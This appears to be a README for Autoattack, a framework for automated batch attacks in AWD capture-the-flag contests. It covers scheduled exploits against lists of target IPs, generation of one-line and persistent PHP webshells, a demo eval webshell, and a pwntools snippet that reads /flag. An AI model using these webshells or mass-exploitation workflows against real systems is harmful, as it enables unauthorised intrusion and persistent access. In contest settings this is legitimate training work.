Autoattack
Autoattack copied to clipboard
1nhann
awd attack framework,Django + Mysql
-
Autoattack
- Features
- Install:
- 配置数据库:
- 配置 superuser:
- 运行
-
Usage
- demo 环境:
- 配置 host 列表
- 直接攻击,获取 flag
- 写 webshell
- 通过 webshell 进一步攻击
- 配置定时任务
- 登录网站后台
-
关于
utils模块-
utils/awd.py -
utils/django_job.py -
utils/webshell.py -
utils/encoder.py
-
- 如果是 pwn
- 多个场景
- 参考资料
Autoattack
Autoattack ,一个追求可视化和少操作的 awd 批量攻击框架,采用 django + mysql 开发。
___ __ __ __ __
/ | __ __/ /_____ ____ _/ /_/ /_____ ______/ /__
/ /| |/ / / / __/ __ \/ __ `/ __/ __/ __ `/ ___/ //_/
/ ___ / /_/ / /_/ /_/ / /_/ / /_/ /_/ /_/ / /__/ ,<
/_/ |_\__,_/\__/\____/\__,_/\__/\__/\__,_/\___/_/|_|
Author: 1nhann
Watching for file changes with StatReloader
No changes detected
Operations to perform:
Apply all migrations: admin, auth, contenttypes, django_apscheduler, autoattack, sessions
Running migrations:
No migrations to apply.
Admin account has already been initialized.
System check identified no issues (0 silenced).
June 01, 2022 - 12:12:12
Django version 3.2.13, using settings 'config.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CTRL-BREAK.
Features
- 定时任务。主要用于定时运行 exp,可以通过 web 后台可视化管理
- 批量运行 exp。对指定的 ip 列表,批量运行 exp、可以做到写 webshell、访问 webshell 等
- 记录 webshell 信息。用 mysql 记录 webshell 信息,并实时更新,可以通过后台查看各个靶机对应的webshell 的具体信息、存活情况等
- webshell生成模块。开发了一个简单的webshell生成模块,可以方便生成普通一句话木马、不死马等
Install:
python3
git clone https://github.com/1nhann/Autoattack.git
pip install -r requirements.txt
ps:如果安装mysqlclient报错,可以参考 https://pypi.org/project/mysqlclient/ 解决
配置数据库:
-
首先要在 mysql 中手动创建一个database ,名为
autoattack,charset 使用 utf8 (或者直接用 docker-compose 起) -
然后修改
settings.py:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # 数据库引擎
'NAME': 'autoattack', # 数据库名,事先创建
'USER': 'root', # 数据库用户名
'PASSWORD': 'root', # 密码
'HOST': '127.0.0.1', # mysql服务所在的主机ip
'PORT': '3306', # mysql服务端口
}
}
配置 superuser:
在 settings.py 中配置:
ADMIN_USERNAME = "admin"
ADMIN_EMAIL = "[email protected]"
ADMIN_PASSWORD = "admin"
运行
为了能外网访问,需要在 config/settings.py 配置 ALLOWED_HOSTS :
ALLOWED_HOSTS = ["inhann.top"]
python manage.py runserver 0.0.0.0:8000
Usage
demo 环境:
http://ant.com/eval.php :
<?php eval($_REQUEST["code"]);?>
靶机的 flag 在 /flag
配置 host 列表
首先要配置 host 列表,将所有要打的 host 写到 hosts.txt 中:
192.168.56.101
192.168.56.102
192.168.56.103
192.168.56.101:80
192.168.56.102:80
192.168.56.103:80
直接攻击,获取 flag
将 对靶机的操作都放到 example 目录下。
exp.py 用来直接攻击网站获取 flag,核心逻辑在于继承 AwdTask ,override 一个 exp()
写 webshell
write_webshell.py 用来写webshell,核心逻辑在于继承了 AwdTask ,override 一个 write_webshell()
通过 PHP 类,生成用来写 webshell 的代码,然后执行这个代码
通过调用 Example.update_and_test_available() 方法,可以将 webshell 的相关信息写到数据库里面,并判断这个 webshell 是否能成功访问
通过 webshell 进一步攻击
get_flag.py 用来骑马攻击,核心逻辑在于继承了 AwdTask ,override 一个 attack_use_webshell()
直接调用 Example.test_available_and_eval() ,传入要打的 ip 和 执行的代码,这个函数会测试 webshell 是否可以访问,如果可以访问就会去执行 php 代码
配置定时任务
在 /jobs.py 的 jobs 中添加要定时运行的函数(解除注释就行):
# jobs 打开定时任务管理器
from utils.django_job import Scheduler
scheduler = Scheduler.init()
import autoattack.example.exp
# import autoattack.example.write_webshell
# import autoattack.example.get_flag
# import autoattack.example.pwn
# jobs 当中放的是一个个 tuple,表示要定时运行的函数和对应的 id
jobs = [
(autoattack.example.exp.attacker.attack, "example.exp"),
# (autoattack.example.write_webshell.attacker.attack,"example.webshell"),
# (autoattack.example.get_flag.attacker.attack,"example.getflag"),
# (autoattack.example.pwn.attacker.attack,"example.exp"),
]
jobs += [
]
scheduler.add_jobs(jobs,seconds=5) #每5秒执行一次
# scheduler.add_jobs_cron(jobs,hour="10-12",minute="20,40") #每天 10:20 10:40 11:20 11:40 12:20 12:40 执行一次
登录网站后台
访问 http://127.0.0.1:8000/
登录之后的页面:
可以图形化管理要定时运行的任务(删除 job 这个选项暂时没用,对于想要删除的 job ,直接在 jobs.py 的 jobs 中注释掉就行):
每次写完 webshell 之后,webshell 的相关信息都会更新:
如果 webshell 没法访问,也能看到报错信息:
关于 utils 模块
主要是为了支持快速批量打、方便生成 webshell 、方便 django 的开发而写的
utils/awd.py
utils/awd.py 主要实现了批量攻击的功能,其底层逻辑是多线程
继承 AwdTask 类,覆写其 exp() 、write_webshell() 、attack_use_webshell() 等方法,然后把这个类作为参数传入 Attacker 的构造方法中,调用 attacker.attack() 就能攻击
utils/django_job.py
utils/django_job.py 主要是为了方便 django 的开发而写的
定义了一个 WebshellModel 抽象 model ,用来存储 webshell 相关信息
定义了一个 Scheduler ,用来做定时任务
定时任务的开发参考:https://github.com/jcass77/django-apscheduler
| methods in WebshellModel | details |
|---|---|
| eval | 通过ip对应的webshell,执行php代码 |
| test_available_and_eval | 先判断webshell是否可以访问,然后再运行代码 |
| test_available | 判断webshell是否可以访问 |
| update_and_test_available | 更新、添加webshell信息,并判断这个webshell能否访问 |
| webshell_message | 返回webshell信息 |
| update | 更新或添加webshell信息到数据库 |
| register | 将model注册到admin后台,不注册后台看不到 |
| ... | ... |
| ... | ... |
utils/webshell.py
utils/webshell.py 用来生成 webshell
| methods in PHP | details |
|---|---|
| generate | 最基本的,生成一句话木马的php文件 |
| nodiephp | 生成一个写 不死马的 php 文件,触发后就能写入不死马 |
| fatter | 让webshell的体积变大 |
| code_to_write | 生成调用了 file_put_contents 写webshell的 php 代码,用来传入 eval() |
| code_to_write_nodie | 生成调用了 file_put_contents 写不死webshell 的 php 代码,用来传入 eval() |
| password | 给一个 webshell 增加密码 |
| rawcode | 提取一个webshell的php代码 |
| ... | ... |
| ... | ... |
utils/encoder.py
工具类,用来更方便地 encode 和 decode
如果是 pwn
pwn 的话不用写 webshell ,因此只需要参考 直接攻击,获取 flag ,配置定时运行直接攻击的脚本就行
比如:
autoattack/example/pwn.py :
from utils.awd import AwdAttack,AwdTask
from utils.readwrite import readlines
from os.path import dirname
import pwn
class Exp(AwdTask):
def exp(self, host,port):
sh = pwn.remote(host, port)
pwn.context.arch = "i386"
# 本来是 interactive,现在直接执行命令
# sh.interactive()
sh.sendline(b"cat /flag")
result = sh.recv()
print(result)
hosts = readlines(f"{dirname(__file__)}/../../hosts.txt")
attacker = AwdAttack(hosts=hosts,task_class=Exp,port=80,thread_num=5)
# attacker.attack()
然后把这个 attcker 的 attack 方法,添加到 jobs.py 里面:
多个场景
- 参考
example目录,再创建一个新目录
比如说,如果要打 web2,就建立一个 web2 目录
- 在
models.py里面添加一个 webshell model
然后为了记录 webshell 信息,还要在 models.py 里面添加一个 model (继承 WebshellModel ,并且定义完了要 Web2.register() ):
from utils.django_job import WebshellModel
class Example(WebshellModel):
"""
用于记录 webshell 信息
"""
pass
Example.register()
class Web2(WebshellModel):
pass
Web2.register()
这样一个记录 webshell 的表就创好了:
参考资料
https://github.com/jcass77/django-apscheduler
1nhann